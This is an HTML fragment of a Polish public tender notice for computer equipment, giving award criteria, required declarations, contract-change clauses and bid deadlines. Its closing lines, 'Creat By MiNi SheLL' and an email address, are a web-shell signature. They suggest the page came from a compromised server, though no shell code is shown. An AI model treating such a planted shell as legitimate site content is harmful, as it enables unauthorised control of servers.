<h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet 4 – pozostały sprzęt komputerowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213000-5 - Komputery osobiste</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232100-5 - Drukarki i plotery</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">37453300-1 - Dyski</p> <p class="mb-0">30236000-2 - Różny sprzęt komputerowy</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">13.1.	Przy wyborze i ocenie oferty Zamawiający będzie się kierować wyłącznie następującymi kryteriami:<br/>	Kryterium: Cena oferty - 60 %<br/>	Kryterium: Okres gwarancji - 40 %<br/>a)	Kryterium Cena oferty (Pc):<br/>1)	Ocena kryterium zostanie obliczona wg wzoru: „Pc = Cn / Cb * 60”, gdzie:<br/>	Pc - punkty otrzymane za cenę <br/>	Cn - cena najniższej oferty<br/>	Cb - cena badanej oferty<br/>2)	Oferta w kryterium cena może otrzymać maksymalnie 60 punktów, pozostałe oferty proporcjonalnie mniej.<br/>3)	Liczba punktów dla przyjętego kryterium będzie liczona osobno z dokładnością do drugiego miejsca po przecinku. <br/>4)	Do wyliczenia punktowego zostanie przyjęta wartość brutto wyrażona w złotych zgodnie z danymi zamieszczonymi przez Wykonawcę w FO.<br/><br/>b)	Kryterium: Okres gwarancji (Pt):<br/>Okres udzielonej gwarancji zadeklarowany w badanej ofercie wyrażony jest przez Wykonawcę w pełnych miesiącach.<br/><br/>Minimalny obowiązkowy okres udzielonej gwarancji wynosi: 36 miesięcy od momentu dostarczenia sprzętu. Wykonawca zobowiązany jest podać czas w pełnych miesiącach.<br/><br/>Maksymalna liczba punktów możliwa do uzyskania w niniejszym kryterium wynosi: 40 pkt<br/><br/>Ocena ofert w kryterium czas gwarancji zostanie przeprowadzona w odniesieniu do zaoferowanego czas gwarancji i będzie dokonywana według następujących zasad:<br/>Okres udzielonej gwarancji od 60 miesięcy – 40 pkt,<br/>Okres udzielonej gwarancji od 48 miesięcy do 59 miesięcy – 20 pkt,<br/>Okres udzielonej gwarancji od 36 miesięcy do 47 miesięcy – 0 pkt.<br/><br/>Wykonawca, który nie poda w ofercie okresu udzielonej gwarancji zostanie przyznane w niniejszym kryterium 0 pkt, a Zamawiający uznaje, że Wykonawca oferuje udzielenie gwarancji na minimalny okres tj. 36 miesięcy.<br/><br/>13.2.	Ocenę końcową oferty stanowić będzie suma punktów poszczególnych kryteriów obliczonych zgodnie ze wzorem: Pc + Pt = Ocena końcowa.<br/>13.3.	W przypadku gdy dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybierze wśród tych ofert, ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>13.4.	Zamawiający udzieli zamówienia Wykonawcy który otrzyma największą ilość punktów w ocenie końcowej oferty, a jego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	DOTYCZY PAKIETÓW 1, 2:<br/>a)	Oświadczenie, iż firma serwisująca posiada ISO 9001 na świadczenie usług serwisowych oraz posiada autoryzację producenta komputera.<br/>b)	Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski oraz wszystkie komponenty sprzętu pochodzą od jednego producenta lub są przez niego certyfikowane.<br/>c)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry które zaoferował Wykonawca.<br/>d)	Deklaracja zgodności (potwierdzająca oznakowanie wyrobu symbolem CE) - oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami zawartymi w dyrektywach Nowego Podejścia oraz w normach zharmonizowanych.<br/>e)	Oświadczenie Wykonawcy potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych. Wykonawca sporządza oświadczenie w oparciu o dokumentację producenta stacji roboczej wg wytycznych Krajowej Agencji Poszanowania Energii S.A. [https://www.kape.gov.pl], zawartych w dokumencie „Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych”, pkt 3.4.2.1; dokument z grudnia 2006), w szczególności w odniesieniu do zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram.<br/>2)	DOTYCZY PAKIETÓW 3, 4:<br/>a)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry które zaoferował Wykonawca.<br/>b)	Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski oraz wszystkie komponenty sprzętu pochodzą od jednego producenta lub są przez niego certyfikowane. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1)	DOTYCZY PAKIETÓW 1, 2:<br/>a)	Oświadczenie, iż firma serwisująca posiada ISO 9001 na świadczenie usług serwisowych oraz posiada autoryzację producenta komputera.<br/>b)	Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski oraz wszystkie komponenty sprzętu pochodzą od jednego producenta lub są przez niego certyfikowane.<br/>c)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry które zaoferował Wykonawca.<br/>d)	Deklaracja zgodności (potwierdzająca oznakowanie wyrobu symbolem CE) - oświadczenie producenta lub jego upoważnionego przedstawiciela stwierdzające na jego wyłączną odpowiedzialność, że wyrób jest zgodny z zasadniczymi wymaganiami zawartymi w dyrektywach Nowego Podejścia oraz w normach zharmonizowanych.<br/>e)	Oświadczenie Wykonawcy potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych. Wykonawca sporządza oświadczenie w oparciu o dokumentację producenta stacji roboczej wg wytycznych Krajowej Agencji Poszanowania Energii S.A. [https://www.kape.gov.pl], zawartych w dokumencie „Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych”, pkt 3.4.2.1; dokument z grudnia 2006), w szczególności w odniesieniu do zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram.<br/>2)	DOTYCZY PAKIETÓW 3, 4:<br/>a)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry które zaoferował Wykonawca.<br/>b)	Oświadczenie, że oferowany sprzęt jest fabrycznie nowy, pochodzi z oficjalnego kanału sprzedaży producenta na rynek polski oraz wszystkie komponenty sprzętu pochodzą od jednego producenta lub są przez niego certyfikowane. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a)	Wypełniony Formularz ofertowy wg załącznika nr 1 do SWZ. Niniejszy Formularz nie podlega uzupełnieniu na zasadach regulowanych przepisami art. 128 ust. 1 UPZP. Wykonawca wypełnia również wyłącznie informacyjnie formularz systemowy (tj. wartości brutto oraz pozostałe kryteria oceny ofert) na Platformie https://zsm-chorzow.ezamawiajacy.pl/. Dla Zamawiającego wiążący jest wyłącznie Formularz ofertowy. Wykonawca, składając ofertę informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego – Formularz ofertowy, pkt 2 załącznika nr 1 do SWZ (OPIS SPOSOBU OBLICZANIA CENY pkt 12 ppkt. 12.7 SWZ.<br/>b)	Wypełniony Opis przedmiotu zamówienia zgodnie z załącznikiem nr 2 do SWZ. Niniejszy Formularz nie podlega uzupełnieniu na zasadach regulowanych przepisami art. 128 ust. 1 UPZP.<br/>c)	Aktualne na dzień składania ofert oświadczenie o braku podstaw wykluczenia – załącznik nr 4 do SWZ – dołączyć do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym.<br/>d)	Dokumenty i oświadczenia wymienione w pkt 5 SWZ przy których umieszczono dopisek: „dołączyć do oferty”.<br/>e)	Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania dokumentów składanych wraz z ofertą – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 5.21. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>- oświadczenie, o którym mowa w punkcie 9.1 c) SWZ, składa Wykonawca/każdy spośród Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenie te ma potwierdzać brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje brak podstaw wykluczenia.<br/>5.22. W przypadku gdy, Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie<br/>z pełnomocnikiem. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w<br/>postępowaniu o udzielenie zamówienia tych Wykonawców należy dołączyć do oferty.<br/>5.23. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego przekazania kopii umowy regulującej współpracę tych<br/>Wykonawców.<br/>5.24. Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub<br/>Podwykonawca, podmiotowe środki dowodowe oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe<br/>środki dowodowe, oraz pełnomocnictwo sporządza w postaci elektronicznej i opatruje kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym W przypadku gdy Wykonawca, Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub Podwykonawca, podmiotowe środki dowodowe<br/>oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, lub pełnomocnictwo, sporządzi<br/>jako dokument w postaci papierowej i opatrzy własnoręcznym podpisem, przekazuje cyfrowe odwzorowanie tego<br/>dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Dokumenty<br/>te należy wczytać na Platformę: https://zsm-chorzow.ezamawiajacy.pl poprzez zakładkę Korespondencja, poza<br/>zobowiązaniem podmiotu udostępniającego zasoby oraz przedmiotowymi środkami dowodowymi które należy dołączyć do<br/>oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 11 Zmiany postanowień umowy<br/>1.	Zmiana Umowy dopuszczalna jest w zakresie i na warunkach przewidzianych przepisami ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (t.j. Dz.U. 2024 poz. 1320).<br/>2.	Zamawiający dopuszcza zmianę umowy w zakresie danych identyfikujących Strony Umowy, takich jak np. firma, adres siedziby lub inne postanowienia dotyczące wskazania stron.<br/>3.	Zamawiający dopuszcza wydłużenie terminu płatności w przypadku zmiany ustawy z dnia 8 marca 2013 r. o przeciwdziałaniu nadmiernym opóźnieniom w transakcjach handlowych (t.j. Dz. U. 2023 poz. 1790). <br/>4.	Zmiany postanowień Umowy zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić w następujących sytuacjach:<br/>1)	w przypadku przerwy w pracach spowodowanej działaniem siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,<br/>2)	zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego,<br/>3)	zaistnienia okoliczności (technicznych, gospodarczych i tym podobnych), których nie można było przewidzieć w chwili zawarcia Umowy (z zastrzeżeniem, że zmiany te nie mogą powodować zmiany terminu zakończenia realizacji Umowy, ani też wysokości wynagrodzenia, ani obniżenia parametrów technicznych i jakościowych zaoferowanego przedmiotu zamówienia):<br/>a)	zmiana oferowanego przez Wykonawcę sprzętu/oprogramowania w sytuacji wprowadzenia na rynek przez Wykonawcę lub osobę trzecią nowszej wersji sprzętu/oprogramowania,<br/>b)	zmiana oferowanego przez Wykonawcę sprzętu lub oprogramowania w sytuacji ujawnienia się powszechnie występujących wad zaoferowanego sprzętu/oprogramowania,<br/>4)	zmiany oferowanego przez Wykonawcę sprzętu o ile nowe oprogramowanie posiada parametry i właściwości równoważne lub lepsze niż pierwotnie zaoferowane,<br/>5)	zmiany albo rezygnacji z podwykonawcy będącego podmiotem, na którego zasoby Wykonawca powoływał się, na zasadach określonych w UPZP, w celu wykazania spełniania warunków udziału w postępowaniu,<br/>6)	w przypadku przestojów i przypadków zwłoki z przyczyn leżących po stronie Zamawiającego, mających bezpośredni wpływ na termin wykonania przedmiotu umowy, z zastrzeżeniem, że okres przesunięcia terminu nie może być dłuższy niż okres trwania udokumentowanych przestojów i przypadków zwłoki,<br/>5.	Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania Umowy zawierające opis proponowanych zmian, ich uzasadnienie oraz termin wprowadzenia.<br/>6.	W przypadku złożenia wniosku o zmianę, druga Strona jest zobowiązana w terminie 3 dni roboczych od dnia otrzymania wniosku do ustosunkowania się do niego. Przede wszystkim druga Strona może:<br/>1)	zaakceptować wniosek o zmianę,<br/>2)	wezwać Stronę wnioskującą o zmianę do uzupełnienia wniosku lub przedstawienia dodatkowych wyjaśnień wraz ze stosownym uzasadnieniem takiego wezwania,<br/>3)	zaproponować podjęcie negocjacji treści umowy w zakresie wnioskowanej zmiany,<br/>4)	odrzucić wniosek o zmianę. <br/>7.	Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie Strony, pod rygorem nieważności takiego oświadczenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">10.2 Ofertę należy złożyć na Platformie pod adresem: https://zsm-chorzow.ezamawiajacy.pl w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-30 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8.1.	Wykonawca jest związany ofertą, przez okres 30 dni, tj. do dnia 28.11.2024 r. przy czym pierwszym dniem terminu związania ofertą jest dzień, w którym upływa termin składania ofert.<br/>8.3.	Przedłużenie terminu związania ofertą, o którym mowa powyżej, wymaga złożenia przez Wykonawcę pisemnego oświadczenia o wyrażeniu zgody na przedłużenie terminu związania ofertą. W przypadku gdy Wykonawca nie złoży ww. oświadczenia, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 12 UPZP.<br/>8.4.	W przypadku gdy Zamawiający żąda wniesienia wadium, przedłużenie terminu związania ofertą, o którym mowa w pkt 8.2 SWZ, następuje wraz z przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. W przypadku gdy Wykonawca nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 14 UPZP.

Creat By MiNi SheLL
Email: jattceo@gmail.com